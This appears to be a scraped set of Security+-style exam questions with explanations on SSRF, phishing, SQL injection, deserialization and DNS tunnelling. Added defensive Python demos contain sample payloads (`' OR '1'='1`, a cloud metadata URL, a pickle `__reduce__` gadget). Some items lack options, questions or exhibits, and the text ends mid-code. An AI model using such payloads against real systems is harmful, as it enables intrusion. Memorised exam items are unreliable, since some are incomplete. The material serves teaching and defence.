A cloud-hosted API lets users supply a URL for the service to fetch an image. Shortly after release, logs show requests to 169.254.169.254 and internal admin addresses. What control best reduces this risk?
A.Allow the API to follow any redirect so it works with more image sources.
B.Restrict outbound requests to an allowlist and block internal address ranges.
C.Store the fetched image in encrypted form before sending it to users.
D.Increase the session timeout to reduce repeated logins by legitimate users.
AnswerB
This is a classic server-side request forgery pattern: the server is making attacker-influenced requests to internal or metadata addresses. An allowlist of approved destinations, combined with blocking private and link-local ranges, prevents the service from being used as a proxy into internal systems. That control directly targets the unsafe outbound request behavior and is more effective than trying to clean malicious URLs after the fact. It also reduces exposure to cloud metadata theft and internal service probing.
Why this answer
Option B is correct because restricting outbound requests to an allowlist and blocking internal address ranges directly mitigates the Server-Side Request Forgery (SSRF) vulnerability. The requests to 169.254.169.254 (the AWS/GCP/Azure metadata endpoint) and internal admin addresses indicate an attacker is using the API to probe internal services. An allowlist ensures the API only connects to trusted external hosts, while blocking private and link-local ranges prevents access to internal infrastructure.
Exam trap
The trap here is that candidates may confuse data-at-rest protection (encryption) with outbound access control, or assume that following redirects only improves functionality without realizing that a redirect is exactly how an attacker turns an allowed external URL into a request to an internal address; CompTIA often tests the cloud metadata endpoint (169.254.169.254) as a classic SSRF indicator.
How to eliminate wrong answers
Option A is wrong because allowing the API to follow any redirect would actually increase the SSRF risk, as an attacker could craft a redirect from an allowed external URL to an internal or metadata endpoint, bypassing initial URL checks. Option C is wrong because storing the fetched image in encrypted form does not prevent the API from making unauthorized requests to internal or metadata endpoints; encryption protects data at rest, not the request origin or destination.
A finance analyst receives an email that appears to come from the CFO. It references a real project, asks for an urgent wire transfer to a "new vendor account," and says to avoid the normal approval workflow because the deal is time-sensitive. What is the best immediate response?
A.Reply to the email asking for additional payment details and wait for a response.
B.Process the transfer quickly because the message appears to come from an executive.
C.Verify the request using a known-good contact method and report the message as suspicious.
D.Forward the email to another finance employee so someone else can confirm the request.
AnswerC
The safest response is to independently verify the request through a trusted channel already on file, such as a known phone number or internal messaging system. That breaks the attacker’s control of the conversation and prevents a rushed financial error. Reporting the message also helps security staff search for related phishing attempts and protect other employees from a similar business email compromise attempt.
Why this answer
The best response is to verify the request through a known, trusted communication path and then report it. In a spear phishing or business email compromise scenario, the attacker relies on urgency, authority, and familiarity to bypass normal controls. A separate phone call, chat message, or in-person confirmation using an existing contact list provides stronger assurance than any reply to the suspicious email itself.
Why others are wrong: Replying, processing the transfer, or forwarding the message all keep the workflow inside the attacker’s channel and increase the chance of fraud. None of those actions independently validate the sender’s identity or the payment change request. The key security habit is to stop, verify outside the email thread, and escalate the suspicious communication.
A SIEM alert shows one workstation connecting to many internal systems over SMB in a short period of time, followed by attempts to access administrative shares. What is the best response?
A.Ignore the alert because SMB is a normal file-sharing protocol
B.Isolate the workstation to stop possible lateral movement
C.Increase the workstation's monitor brightness to help the user notice alerts
D.Disable all SMB traffic across the entire company immediately
AnswerB
Rapid SMB connections to multiple hosts are a strong sign of spread or lateral movement, so isolation is the safest immediate action.
Why this answer
Option B is correct because the SIEM alert describes classic indicators of lateral movement using SMB, often associated with ransomware or worm-like malware. Isolating the workstation immediately stops the attacker from spreading to other systems via administrative shares (e.g., ADMIN$, C$), which are commonly abused for remote execution. This containment step is the highest priority before any forensic analysis.
Exam trap
The trap here is that candidates may dismiss the alert as normal SMB traffic (Option A) because SMB is common, failing to recognize that the combination of rapid connections and administrative share access is a textbook lateral movement indicator.
How to eliminate wrong answers
Option A is wrong because while SMB is a normal file-sharing protocol, the specific pattern of rapid connections to many internal systems followed by administrative share access is highly anomalous and indicative of malicious lateral movement, not legitimate use. Option C is wrong because increasing monitor brightness has no security function and does not address the alert; it is a nonsensical response that confuses physical display settings with security operations. Option D is wrong because disabling all SMB traffic company-wide is an overly drastic and disruptive response that would break critical business operations, and it should only be considered after proper investigation and with targeted controls like firewall rules or GPO changes.
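An added example, not from the original page: detection logic of the kind that would raise this SIEM alert, run over constructed log lines. The field layout (a normalized merge of NetFlow and authentication events), the ten-minute window, the five-host threshold and the share names are assumptions for the demo; a real rule would be tuned against the environment's baseline.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Shares whose access from a workstation is unusual: the administrative
# shares the explanation mentions plus hidden drive shares. Assumed list.
ADMIN_SHARES = {"ADMIN$", "C$", "D$"}

# Constructed sample: a normalized view of NetFlow plus authentication
# events. 10.0.1.25 fans out across a subnet; 10.0.1.40 is a normal user.
SAMPLE_LOG = """\
2024-05-01T10:00:01 src=10.0.1.25 dst=10.0.2.11 proto=smb share=Public
2024-05-01T10:00:04 src=10.0.1.25 dst=10.0.2.12 proto=smb share=Public
2024-05-01T10:00:09 src=10.0.1.25 dst=10.0.2.13 proto=smb share=Public
2024-05-01T10:00:15 src=10.0.1.25 dst=10.0.2.14 proto=smb share=ADMIN$
2024-05-01T10:00:22 src=10.0.1.25 dst=10.0.2.15 proto=smb share=C$
2024-05-01T10:00:30 src=10.0.1.25 dst=10.0.2.16 proto=smb share=ADMIN$
2024-05-01T10:00:41 src=10.0.1.25 dst=10.0.2.17 proto=winrm
2024-05-01T10:02:00 src=10.0.1.40 dst=10.0.2.50 proto=smb share=Finance
2024-05-01T10:03:00 src=10.0.1.40 dst=10.0.2.50 proto=smb share=Finance
2024-05-01T10:04:00 src=10.0.1.40 dst=10.0.2.51 proto=smb share=Finance
2024-05-01T10:30:00 src=10.0.1.25 dst=10.0.2.60 proto=smb share=Public
"""


def parse_event(line):
    """'ts key=value ...' -> dict with a parsed timestamp."""
    ts, *pairs = line.split()
    event = dict(pair.split("=", 1) for pair in pairs)
    event["ts"] = datetime.fromisoformat(ts)
    return event


def detect_lateral_movement(log_text, window=timedelta(minutes=10), min_hosts=5):
    """Return {src: details} for sources that touched >= min_hosts distinct
    hosts over SMB/WinRM inside any `window`, noting admin-share targets."""
    by_src = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        event = parse_event(line)
        if event.get("proto") in ("smb", "winrm"):
            by_src[event["src"]].append(event)

    alerts = {}
    for src, events in by_src.items():
        events.sort(key=lambda e: e["ts"])
        for i, first in enumerate(events):  # slide the window over each start
            hosts, admin_targets = set(), set()
            for event in events[i:]:
                if event["ts"] - first["ts"] > window:
                    break
                hosts.add(event["dst"])
                if event.get("share") in ADMIN_SHARES:
                    admin_targets.add(event["dst"])
            if len(hosts) >= min_hosts:
                alerts[src] = {
                    "window_start": first["ts"].isoformat(),
                    "distinct_hosts": len(hosts),
                    "admin_share_targets": sorted(admin_targets),
                }
                break  # one alert per source is enough to trigger isolation
    return alerts


if __name__ == "__main__":
    for src, details in detect_lateral_movement(SAMPLE_LOG).items():
        print(src, details)
```

The output names the single source worth isolating and the hosts it reached over administrative shares, which is also the list a responder would check first for follow-on activity; the normal user who hit one file server several times never trips the rule.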
A user forwards an email that says their payroll account will be disabled today unless they click a link and verify their password. The message uses the company logo, but the sender address is from a free webmail domain and the link goes to a look-alike login page. What type of attack is this?
A.Baiting, because the attacker is offering something attractive to lure the user.
B.Phishing, because the attacker is using a fraudulent message to steal credentials.
C.Vishing, because the attacker is trying to trick the user into revealing information.
D.Impersonation, because the attacker is pretending to be someone from the company.
AnswerB
Phishing is the best match because the attacker is sending a deceptive message that impersonates a trusted source and directs the user to a fake login page. The goal is credential theft, and the urgency plus look-alike site are common signs. The sender address and request to verify a password are strong indicators of a phishing attempt.
Why this answer
This is a classic phishing attack because the attacker uses a fraudulent email that mimics a legitimate company to trick the user into clicking a link to a look-alike login page, with the goal of stealing their payroll credentials. The key indicators are the spoofed company logo, the free webmail sender address, and the fake login page, all of which are hallmarks of credential harvesting via phishing.
Exam trap
The trap here is that candidates may confuse phishing with vishing or baiting because all involve social engineering, but the specific use of email with a fraudulent link to a fake login page is the defining characteristic of phishing, not voice calls (vishing) or physical lures (baiting).
How to eliminate wrong answers
Option A is wrong because baiting involves offering something attractive (e.g., a free USB drive or download) to lure the victim into a trap, not sending a deceptive email requesting credential verification. Option C is wrong because vishing (voice phishing) uses phone calls or voice messages to trick victims, not email with a link to a fake login page. Option D is wrong because impersonation is a broader social engineering tactic that can be part of phishing, but the specific attack described—using a fraudulent email with a malicious link—is precisely defined as phishing, not impersonation alone.
A support portal searches customers by last name using a parameter called q. After one user enters a single quote, the app returns a SQL syntax error. A tester then submits `test' OR '1'='1` and sees every customer record. Which control most directly prevents this issue?
A.Parameterize the database queries with prepared statements
AnswerA
Prepared statements separate code from data, so attacker-controlled input cannot change the intended SQL query structure.
Why this answer
The vulnerability is SQL injection, which occurs when user input is directly concatenated into a SQL query. Parameterized queries (prepared statements) separate SQL logic from data by using placeholders, ensuring user input is treated as data only and never executed as code. This directly prevents the attacker from injecting malicious SQL fragments like `' OR '1'='1`.
Exam trap
The trap here is that candidates often confuse output encoding (XSS prevention) with input handling (SQL injection prevention), or they think network controls like VLANs can fix application-layer code flaws.
How to eliminate wrong answers
Option B is wrong because encoding output prevents cross-site scripting (XSS), not SQL injection; the attack occurs on the database backend, not in the browser. Option C is wrong because CSRF tokens prevent cross-site request forgery, which tricks a user into submitting unintended requests, but does not stop an attacker from directly crafting malicious input in the search parameter. Option D is wrong because moving the application to a separate VLAN is a network segmentation control that limits lateral movement but does not fix the insecure database query code; the SQL injection would still succeed from the application server.
The host receives repeated ARP replies claiming the gateway IP belongs to a different MAC address, and the same MAC appears on multiple switch ports. That combination indicates ARP spoofing or poisoning, which can redirect traffic through an attacker for interception or disruption. The brief forwarding to another IP is consistent with a man-in-the-middle attempt built on forged ARP replies.
Why this answer
ARP spoofing is the most likely attack because the exhibit shows an attacker sending forged ARP replies to associate the attacker's MAC address with the IP address of the default gateway. This poisons the ARP cache of the victim, causing all traffic destined for the gateway to be sent to the attacker instead, enabling man-in-the-middle interception.
Exam trap
The trap here is that candidates confuse ARP spoofing with DNS cache poisoning because both involve 'poisoning' a cache, but ARP operates at Layer 2 (MAC addresses) while DNS operates at Layer 7 (domain name resolution).
How to eliminate wrong answers
Option A is wrong because DNS cache poisoning involves corrupting a DNS resolver's cache with false DNS records, not manipulating ARP tables at Layer 2. Option C is wrong because a replay attack captures and retransmits valid data packets to trick the receiver, but the exhibit shows direct manipulation of MAC-to-IP mappings, not packet replay. Option D is wrong because an amplification denial-of-service attack uses small queries to generate large responses (e.g., DNS amplification), overwhelming a target with traffic, whereas the exhibit depicts local network ARP manipulation.
A Java-based internal portal accepts a serialized object during profile import. After a recent test upload, the server made outbound LDAP calls and created a new local account. What attack pattern best explains this behavior?
A.SQL injection, because the attacker likely altered a database query.
B.Cross-site scripting, because the attacker could have injected script into the portal.
C.Insecure deserialization, because a crafted object triggered unexpected server-side actions.
D.CSRF, because the attacker may have forced an administrator to submit a form.
AnswerC
Insecure deserialization occurs when an application accepts untrusted serialized data and rebuilds it unsafely. That can allow an attacker to trigger code paths, remote lookups, or even command execution, which matches the LDAP activity and account creation.
Why this answer
Option C is correct because the scenario describes a Java application accepting a serialized object during profile import, which is a classic vector for insecure deserialization attacks. By crafting a malicious serialized object, an attacker can trigger arbitrary code execution on the server, leading to outbound LDAP calls and local account creation—actions that are not part of normal profile import logic. This attack exploits the trust placed in serialized data without proper validation or integrity checks.
Exam trap
The trap here is that candidates may confuse insecure deserialization with other injection attacks (SQLi or XSS) because all involve untrusted input, but only deserialization directly allows server-side object reconstruction and arbitrary method invocation without proper validation.
How to eliminate wrong answers
Option A is wrong because SQL injection involves manipulating database queries through input fields, not through serialized objects; the described behavior (LDAP calls and account creation) is not typical of SQL injection, which primarily targets data extraction or modification. Option B is wrong because cross-site scripting (XSS) involves injecting client-side scripts into web pages viewed by other users, not server-side object deserialization; XSS cannot directly cause the server to make outbound LDAP calls or create local accounts.
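An added example, not part of the original page: the same pattern shown in Python's pickle format, which, like Java serialization, lets the serialized bytes name a callable to invoke while reconstructing the object. The side-effect function only records the call; it stands in for the LDAP lookup or account creation described in the question. The class names and the allowlist are assumptions for the demo.

```python
import io
import json
import pickle

# Records what untrusted data managed to make the server do. In the real
# incident this would be the LDAP call or the account creation.
SIDE_EFFECTS = []


def create_local_account(name):
    """Stand-in for a dangerous server-side action; it only logs the call."""
    SIDE_EFFECTS.append(f"account created: {name}")
    return name


class Profile:
    """The only type a profile import legitimately contains."""
    def __init__(self, display_name):
        self.display_name = display_name


class HostileProfile:
    """Shape of an attacker's object: the deserializer reconstructs it by
    calling create_local_account("backdoor") instead of building data."""
    def __reduce__(self):
        return (create_local_account, ("backdoor",))


def import_profile_unsafe(blob):
    """Vulnerable: trusts whatever the bytes say to instantiate."""
    return pickle.loads(blob)


class RestrictedUnpickler(pickle.Unpickler):
    """Hardened: only the Profile class may be reconstructed; any other
    global (functions included) is refused before it is looked up."""
    ALLOWED = {(Profile.__module__, "Profile")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"refused to load {module}.{name}")


def import_profile_restricted(blob):
    """Return ('ok', object) or ('refused', message)."""
    try:
        return "ok", RestrictedUnpickler(io.BytesIO(blob)).load()
    except pickle.UnpicklingError as exc:
        return "refused", str(exc)


def import_profile_json(text):
    """Safer still: a data-only format with a schema check; nothing in the
    document can name a class or function."""
    data = json.loads(text)
    if not (isinstance(data, dict) and set(data) == {"display_name"}
            and isinstance(data["display_name"], str)):
        raise ValueError("invalid profile document")
    return Profile(data["display_name"])
```

The unsafe importer returns the string "backdoor" and leaves an entry in SIDE_EFFECTS even though no Profile was ever built; the restricted unpickler refuses the hostile bytes at find_class, before anything runs, yet still loads a genuine Profile. Java's counterpart to the allowlist is ObjectInputFilter (JEP 290) on ObjectInputStream, and outbound LDAP from a deserialization endpoint is a red flag precisely because gadget chains commonly reach JNDI lookups.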
Based on the exhibit, which attack is most likely being attempted against the application?
A.Cross-site scripting, because the attacker is trying to inject script into the victim's browser session.
B.Server-side request forgery, because the application is being tricked into making internal requests on the attacker's behalf.
C.Cross-site request forgery, because the attacker is forcing an authenticated user to submit an unwanted request.
D.SQL injection, because the attacker is manipulating a query parameter to expose backend data.
AnswerB
The application accepts a URL parameter and then makes outbound requests to internal resources, including the cloud metadata endpoint. That is the hallmark of SSRF. The attacker is causing the server to reach addresses that should not normally be accessible through a public request path.
Why this answer
The exhibit shows an attacker manipulating a URL parameter (e.g., `?url=http://169.254.169.254/latest/meta-data/`) to make the application fetch an internal resource. This is a classic Server-Side Request Forgery (SSRF) attack, where the application is tricked into making requests to internal services (like cloud metadata endpoints) on the attacker's behalf, bypassing network segmentation.
Exam trap
CompTIA often tests SSRF by showing a URL parameter like `?url=` or `?file=` pointing to an internal IP (e.g., 127.0.0.1 or 169.254.169.254), and candidates confuse it with CSRF because both involve 'forged requests,' but SSRF is server-side while CSRF is client-side.
How to eliminate wrong answers
Option A is wrong because cross-site scripting (XSS) involves injecting client-side scripts (e.g., JavaScript) into a victim's browser, not manipulating server-side requests to internal resources. Option C is wrong because cross-site request forgery (CSRF) forces an authenticated user to submit an unwanted request (e.g., via a forged HTTP POST), but the exhibit shows the attacker directly controlling the request URL, not relying on a victim's session. Option D is wrong because SQL injection manipulates a database query (e.g., `' OR 1=1--`), whether the payload arrives in a form field or a URL parameter; the exhibit shows the parameter being used to make the server issue HTTP requests to internal IPs, not to alter a query.
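An added example, not from the original page, covering both SSRF questions above: a Python destination check of the kind Option B of the image-fetch question describes, which also refuses the `?url=http://169.254.169.254/...` indicator from the exhibit question. The allowlisted hostnames, the fake resolver and the fetch stub are assumptions for the demo; default_resolver uses real DNS.

```python
import ipaddress
import socket
from urllib.parse import urlparse

# Assumed for this example: the only image sources the fetcher may contact.
ALLOWED_HOSTS = {"images.example.com", "cdn.example.org"}
ALLOWED_SCHEMES = {"http", "https"}

# Private, loopback, link-local (includes 169.254.169.254) and shared-address
# ranges; an allowlisted name that resolves into one of these is refused too.
BLOCKED_NETWORKS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "100.64.0.0/10", "127.0.0.0/8",
    "169.254.0.0/16", "172.16.0.0/12", "192.168.0.0/16",
    "::1/128", "fc00::/7", "fe80::/10",
)]
REDIRECT_CODES = {301, 302, 303, 307, 308}


def is_blocked_ip(ip_text):
    """True if the address falls in a range the fetcher must never reach."""
    ip = ipaddress.ip_address(ip_text)
    # ::ffff:169.254.169.254 is the same target written as IPv4-mapped IPv6.
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return any(ip in net for net in BLOCKED_NETWORKS)


def default_resolver(host):
    """Resolve a hostname to every address it maps to (real DNS)."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def validate_fetch_url(url, resolver=default_resolver):
    """Return (ok, reason). Checks scheme, allowlist, then every resolved IP."""
    parsed = urlparse(url)
    if parsed.scheme not in ALLOWED_SCHEMES:
        return False, "scheme not allowed"
    host = parsed.hostname
    if not host:
        return False, "no host in URL"
    if host not in ALLOWED_HOSTS:
        return False, f"{host} is not on the allowlist"
    try:
        addresses = resolver(host)
    except OSError:
        return False, f"{host} did not resolve"
    for addr in addresses:
        if is_blocked_ip(addr):
            return False, f"{host} resolves to blocked address {addr}"
    return True, "ok"


def fetch_with_revalidation(url, fetch, resolver=default_resolver, max_hops=3):
    """Follow redirects only after re-validating each hop.

    fetch(url) is the caller's HTTP client stub; it returns (status, location).
    This is the opposite of Option A (follow any redirect): a redirect from an
    allowed host to 169.254.169.254 is refused before it is requested.
    """
    for _ in range(max_hops + 1):
        ok, reason = validate_fetch_url(url, resolver)
        if not ok:
            return False, f"refused {url}: {reason}"
        status, location = fetch(url)
        if status in REDIRECT_CODES and location:
            url = location
            continue
        return True, url
    return False, "too many redirects"
```

Two practical caveats the check above does not remove on its own: resolve once and connect to the validated address rather than letting the HTTP client resolve again (otherwise a DNS rebinding trick can swap in an internal address between check and use), and keep the fetcher on a network path that cannot reach the metadata service at all, so the allowlist is not the only layer.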
A login form sends user input directly into a database query. When a tester enters a single quote character, the application returns a database error. What attack is most likely?
A.Cross-site scripting
B.SQL injection
C.Session hijacking
D.Insecure deserialization
AnswerB
This is SQL injection because the application appears to concatenate unsanitized input into a database query. A single quote often breaks query syntax and reveals that user input is being interpreted as part of the SQL command. That is a common sign the application is vulnerable to injection attacks.
Why this answer
The application directly concatenates user input into a database query without sanitization. Entering a single quote breaks the SQL syntax, causing a database error, which is a classic indicator of SQL injection (SQLi). This vulnerability allows an attacker to manipulate the query structure and potentially extract or modify database contents.
Exam trap
The trap here is that candidates may confuse the immediate error response with cross-site scripting (XSS), but the database error clearly indicates the injection is targeting the SQL layer, not the browser's DOM.
How to eliminate wrong answers
Option A is wrong because cross-site scripting (XSS) involves injecting client-side scripts into web pages viewed by other users, not directly into database queries, and a single quote would not typically trigger a database error in an XSS context. Option C is wrong because session hijacking targets an authenticated user's session token (e.g., via theft or fixation) and does not involve injecting characters into a login form to cause a database error. Option D is wrong because insecure deserialization exploits the processing of serialized objects (e.g., PHP or Java serialization) to execute arbitrary code or manipulate application logic, not by sending a single quote into a database query.
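An added example, not from the original page, serving both this question and the earlier support-portal question: the concatenated query beside its parameterized replacement, run against a constructed in-memory SQLite table so the single-quote error and the `test' OR '1'='1` full dump can be observed directly. Table and names are assumptions for the demo.

```python
import sqlite3


def make_demo_db():
    """Constructed in-memory table standing in for the customer database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE customers (id INTEGER PRIMARY KEY, last_name TEXT)")
    conn.executemany("INSERT INTO customers (last_name) VALUES (?)",
                     [("Smith",), ("Jones",), ("Brown",)])
    return conn


def search_vulnerable(conn, q):
    """The flawed pattern: q is spliced into the SQL text, so quotes in q
    change the query's structure."""
    sql = "SELECT last_name FROM customers WHERE last_name = '" + q + "'"
    return sorted(row[0] for row in conn.execute(sql))


def search_parameterized(conn, q):
    """The fix: a placeholder sends q to the driver as data; the query's
    structure is fixed before any user input is seen."""
    sql = "SELECT last_name FROM customers WHERE last_name = ?"
    return sorted(row[0] for row in conn.execute(sql, (q,)))


def probe(conn, search, q):
    """What a tester observes: ('rows', [...]) or ('error', message)."""
    try:
        return "rows", search(conn, q)
    except sqlite3.Error as exc:
        return "error", str(exc)


if __name__ == "__main__":
    db = make_demo_db()
    for payload in ("Smith", "'", "test' OR '1'='1"):
        print(repr(payload), probe(db, search_vulnerable, payload), probe(db, search_parameterized, payload))
```

With the vulnerable function the lone quote produces a syntax error (the clue in the question) and the `OR '1'='1` payload returns every row; the parameterized function returns the exact-match result for "Smith" and an empty result for both payloads, because the database receives them as a string to compare, never as SQL.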
An accounts payable clerk receives an email that appears to come from a long-time vendor. The message asks for an urgent change to bank routing information, says the CFO is traveling, and requests that no one call back because the matter is confidential. The display name looks legitimate, but the reply-to address is different from the sender identity. Which three findings most strongly indicate a pretexting or business email compromise attempt? Select three.
Select 3 answers
A.The message requests a payment change outside the normal approval workflow.
B.The reply-to address does not match the claimed sender identity.
C.The recipient is told to keep the request confidential and avoid calling back.
D.The email contains a professional logo and a consistent signature block.
E.The email uses correct spelling and grammar throughout.
AnswersA, B, C
Unauthorized changes to payment instructions are a classic business email compromise tactic. This bypasses established controls and tries to exploit urgency. It is one of the strongest indicators because legitimate vendors normally accept verification through established channels, not a one-off email request.
Why this answer
Option A is correct because the request for a payment change outside the normal approval workflow is a classic indicator of business email compromise (BEC). Attackers exploit the absence of standard verification steps, such as dual authorization or manager sign-off, to redirect funds fraudulently. This bypass of established procedures directly aligns with the social engineering technique of pretexting, where the attacker fabricates a scenario (urgent, confidential, CFO traveling) to pressure the victim into violating policy.
Exam trap
CompTIA often tests the misconception that surface-level professionalism (logos, grammar) indicates legitimacy, when in fact these are easily replicated and the true red flags are procedural violations and header mismatches.
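An added example, not part of the original page, covering this question and the earlier CFO wire-transfer question: a small header-and-body check that surfaces the three correct findings (payment change, reply-to mismatch, secrecy and urgency) and ignores the cosmetic ones. The two messages are constructed for the demo and the keyword lists are assumptions; a production filter would also check SPF/DKIM alignment and the display name against a known-vendor directory.

```python
from email import message_from_string
from email.utils import parseaddr

# Indicator vocabularies; assumed for this example and deliberately small.
PAYMENT_CHANGE = ("routing", "bank account", "wire", "new vendor account", "payment details")
URGENCY = ("urgent", "immediately", "today", "time-sensitive")
SECRECY = ("confidential", "no need to call", "do not call", "don't call", "keep this between")

# Constructed sample messages, not real mail.
SUSPICIOUS = """\
From: Acme Supplies Billing <billing@acmesupplies.example>
Reply-To: billing@acmesupplies-accounts.example
To: ap@victim.example
Subject: Updated banking details - urgent

Hello, please update our bank routing information before today's payment run.
The CFO is traveling and this is confidential, so no need to call back.
"""

BENIGN = """\
From: Acme Supplies Billing <billing@acmesupplies.example>
To: ap@victim.example
Subject: Invoice 1042

Hello, attached is invoice 1042 for last month's deliveries. Thanks!
"""


def domain_of(addr):
    """Lower-cased domain part of an address, '' if there is none."""
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""


def bec_findings(raw_message):
    """Return the list of red flags present in one plain-text message."""
    msg = message_from_string(raw_message)
    _, from_addr = parseaddr(msg.get("From", ""))
    _, reply_addr = parseaddr(msg.get("Reply-To", ""))
    text = (msg.get("Subject", "") + "\n" + msg.get_payload()).lower()

    findings = []
    if reply_addr and domain_of(reply_addr) != domain_of(from_addr):
        findings.append(f"reply-to domain {domain_of(reply_addr)} differs from sender domain {domain_of(from_addr)}")
    if any(k in text for k in PAYMENT_CHANGE):
        findings.append("requests a change to payment instructions")
    if any(k in text for k in URGENCY):
        findings.append("applies time pressure")
    if any(k in text for k in SECRECY):
        findings.append("asks for secrecy or discourages call-back verification")
    return findings


if __name__ == "__main__":
    print(bec_findings(SUSPICIOUS))
    print(bec_findings(BENIGN))
```

Note what the check does not look at: logos, signature blocks and grammar contribute nothing to the score, matching the exam trap. Any non-empty result should route the message to the same out-of-band verification the answer explanations describe, never to a reply.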
Based on the exhibit, what type of attack is most likely being used against the accounts payable team?
A.Phishing, because the message asks recipients to open a file and respond quickly.
B.Spear phishing, because the email is tailored to a specific team, project, and recipient.
C.Pretexting, because the sender claims to have spoken with the recipient before.
D.Baiting, because the attacker offers a useful file related to the project.
AnswerB
This is spear phishing because the attacker uses personalized details such as the recipient's name, the internal project name, and a plausible business deadline. Those details are meant to increase trust and pressure the victim into taking action. The goal is to trick a specific target or group, not to send an indiscriminate message to everyone.
Why this answer
B is correct because spear phishing is a targeted attack where the email is customized for a specific individual or group, using personal details like the recipient's name, team, and project to increase credibility. The exhibit shows the email addresses the recipient by name, references the 'Acme Corp Q3 audit' project, and is sent to the accounts payable team, which matches the tailored nature of spear phishing. This makes it more convincing than generic phishing, as the attacker has researched the target to craft a relevant lure.
Exam trap
The trap here is that candidates confuse spear phishing with generic phishing because both involve email, but the key differentiator is the level of personalization—spear phishing uses specific details like the recipient's name and project, while phishing uses generic greetings like 'Dear Customer'.
How to eliminate wrong answers
Option A is wrong because phishing is a broad, untargeted attack sent to many recipients, while the email in the exhibit is specifically addressed to a named individual on the accounts payable team and references a specific project, indicating it is tailored. Option C is wrong because pretexting involves creating a fabricated scenario (e.g., impersonating a colleague or authority figure) to gain trust, but the email does not establish a false identity or backstory beyond claiming a prior conversation, which is a common spear phishing tactic, not a full pretext. Option D is wrong because baiting typically offers a physical item (e.g., a USB drive) or a digital download (e.g., a free file) to lure victims, but the email asks the recipient to open an attached file related to the project, which is a delivery mechanism for malware, not the core attack type—spear phishing better describes the targeted social engineering.
A finance application works normally for weeks after a contractor leaves the company. On the first business day of the quarter, a hidden task runs, deletes archived reports, and then removes itself from the scheduled task list. What type of malware behavior is this?
A.Worm
B.Logic bomb
C.Rootkit
D.Spyware
AnswerB
A logic bomb triggers on a condition such as a date, event, or account status to execute harmful actions.
Why this answer
The malware behavior described is a logic bomb because it lies dormant for a specific period (weeks) and triggers on a predefined condition (the first business day of the quarter) to execute a malicious payload (deleting archived reports) and then self-destructs by removing itself from the scheduled task list. This matches the definition of a logic bomb: malicious code that executes when a logical condition is met, often used for sabotage or delayed attacks.
Exam trap
The trap here is that candidates confuse a logic bomb with a worm because both can execute code automatically, but they fail to recognize that a worm's defining characteristic is self-propagation across networks, not a delayed, condition-based trigger.
How to eliminate wrong answers
Option A is wrong because a worm is self-replicating malware that spreads automatically across networks without user intervention, whereas this scenario involves a hidden task that does not replicate or spread. Option C is wrong because a rootkit is designed to hide the presence of malware or unauthorized processes by modifying the operating system kernel or using hooking techniques, not to trigger a delayed destructive action based on a date. Option D is wrong because spyware is focused on covertly collecting and exfiltrating user data (e.g., keystrokes, browsing habits) without the user's knowledge, not on deleting files or self-removal after a time-based trigger.
Based on the exhibit, what is the MOST likely explanation for the network traffic?
The affected host is not showing a large amount of internet-bound traffic, but its DNS behavior is highly unusual.
A.DNS tunneling used for command-and-control or data transfer
B.ARP poisoning causing the host to redirect traffic to a rogue gateway
C.A browser cache synchronization feature repeatedly polling a cloud service
D.A misconfigured static route sending all web traffic to the wrong subnet
AnswerA
The long random-looking subdomains, repeated NXDOMAIN responses, and lack of normal web traffic are consistent with malicious DNS-based communication.
Why this answer
The exhibit shows a host with minimal internet-bound traffic but highly unusual DNS behavior, such as frequent queries to a single domain or large DNS query sizes. This pattern is characteristic of DNS tunneling, where data is encoded in DNS queries and responses to bypass network controls, often used for command-and-control (C2) communication or covert data exfiltration. The lack of other traffic indicates the host is not performing normal web browsing or data transfers, making DNS tunneling the most likely explanation.
Exam trap
The trap here is that candidates may overlook the significance of 'unusual DNS behavior' and minimal internet traffic, instead focusing on common attacks like ARP poisoning or benign browser features, which would produce different traffic patterns (e.g., high traffic or periodic HTTP requests).
How to eliminate wrong answers
Option B is wrong because ARP poisoning operates at Layer 2: it changes which MAC address the host sends gateway-bound frames to, and it shows up as conflicting IP-to-MAC mappings, not as an unusual pattern of DNS queries from the host. Option C is wrong because a browser cache synchronization feature repeatedly polling a cloud service would generate consistent, periodic HTTP/HTTPS traffic to a known cloud provider, not the highly unusual DNS queries (e.g., high query rates, large TXT records) seen in the exhibit, and would not explain the lack of other internet-bound traffic.
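An added example, not from the original page: a profiler that scores the indicators the answer cites (long random-looking subdomains, NXDOMAIN responses, one parent domain) over constructed DNS log lines, so the tunnelling host stands out from a host doing ordinary lookups. The log format, the seeded label generator and the thresholds are assumptions for the demo.

```python
import math
import random
from collections import defaultdict

# Constructed sample log: "timestamp client qname qtype rcode". The long
# labels are generated with a fixed seed so the sample is reproducible.
_rng = random.Random(7)
_ALPHABET = "abcdefghijklmnopqrstuvwxyz234567"  # base32-style, as tunnels use


def _encoded_label(length=40):
    return "".join(_rng.choice(_ALPHABET) for _ in range(length))


SAMPLE_LOG = [
    f"2024-05-01T09:00:{i:02d} 10.0.5.7 {_encoded_label()}.c2-example.test TXT NXDOMAIN"
    for i in range(6)
] + [
    "2024-05-01T09:00:10 10.0.5.8 www.example.com A NOERROR",
    "2024-05-01T09:00:11 10.0.5.8 mail.example.com A NOERROR",
    "2024-05-01T09:00:12 10.0.5.8 www.example.com A NOERROR",
    "2024-05-01T09:00:13 10.0.5.8 static.example.com A NOERROR",
    "2024-05-01T09:00:14 10.0.5.8 www.example.com A NOERROR",
    "2024-05-01T09:00:15 10.0.5.8 api.example.com A NOERROR",
]


def shannon_entropy(text):
    """Bits per character; random-looking encodings score high."""
    if not text:
        return 0.0
    counts = defaultdict(int)
    for ch in text:
        counts[ch] += 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_name(qname, registrable_labels=2):
    """'abc.c2-example.test' -> ('c2-example.test', 'abc')."""
    labels = qname.rstrip(".").split(".")
    return ".".join(labels[-registrable_labels:]), ".".join(labels[:-registrable_labels])


def profile_dns(lines):
    """Aggregate query statistics per (client, parent domain)."""
    stats = defaultdict(lambda: {"queries": 0, "nxdomain": 0, "txt": 0,
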